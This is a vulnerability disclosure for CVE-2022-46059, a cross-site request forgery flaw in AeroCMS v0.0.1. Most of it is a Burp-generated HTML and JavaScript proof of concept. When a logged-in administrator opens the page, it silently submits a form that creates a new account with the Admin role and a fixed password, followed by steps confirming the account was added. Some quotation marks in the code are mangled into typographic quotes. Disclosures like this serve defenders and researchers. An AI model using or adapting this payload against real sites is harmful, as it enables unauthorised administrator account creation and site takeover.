CVE-2022-46059: CVE/add_user_csrf.md at master · rdyx0/CVE

Permalink

Cannot retrieve contributors at this time

add_user_csrf****Description

AeroCMS v0.0.1 has a vulnerability, Cross-site request forgery(CSRF). This vulnerability may cause the modification of personal information such as administrator password. To exploit this vulnerability, a constructed HTML file needs to be opened.

Exploit

1、Login to admin panel -> Users -> Add User.

2. Build a request package to add administrator information.

<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('’, '’, ‘/’)</script> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open(“POST", “http:\/\/localhost\/AeroCMS-0.0.1\/admin\/users.php?source=add_user", true); xhr.setRequestHeader(“Content-Type", “multipart\/form-data; boundary=----WebKitFormBoundarydLYE4lYNAM12hDqt”); xhr.setRequestHeader(“Accept", “text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9”); xhr.setRequestHeader(“Accept-Language", “zh-CN,zh;q=0.9”); xhr.withCredentials = true; var body = "------WebKitFormBoundarydLYE4lYNAM12hDqt\r\n” + “Content-Disposition: form-data; name=\"username\"\r\n” + “\r\n” + “111111\r\n” + "------WebKitFormBoundarydLYE4lYNAM12hDqt\r\n” + “Content-Disposition: form-data; name=\"password\"\r\n” + “\r\n” + “111111\r\n” + "------WebKitFormBoundarydLYE4lYNAM12hDqt\r\n” + “Content-Disposition: form-data; name=\"user_firstname\"\r\n” + “\r\n” + “\r\n” + "------WebKitFormBoundarydLYE4lYNAM12hDqt\r\n” + “Content-Disposition: form-data; name=\"user_lastname\"\r\n” + “\r\n” + “\r\n” + "------WebKitFormBoundarydLYE4lYNAM12hDqt\r\n” + “Content-Disposition: form-data; name=\"user_email\"\r\n” + “\r\n” + “\r\n” + "------WebKitFormBoundarydLYE4lYNAM12hDqt\r\n" + “Content-Disposition: form-data; name=\"user_image\"; filename=\"\"\r\n” + “Content-Type: application/octet-stream\r\n” + “\r\n” + “\r\n” + "------WebKitFormBoundarydLYE4lYNAM12hDqt\r\n" + “Content-Disposition: form-data; name=\"user_role\"\r\n” + “\r\n” + “Admin\r\n” + "------WebKitFormBoundarydLYE4lYNAM12hDqt\r\n" + “Content-Disposition: form-data; name=\"create_user\"\r\n” + “\r\n” + “Add User\r\n” + "------WebKitFormBoundarydLYE4lYNAM12hDqt–\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html>

3.View that there are currently only two users

4.Click on the constructed web page.

5.The new administrator account was successfully added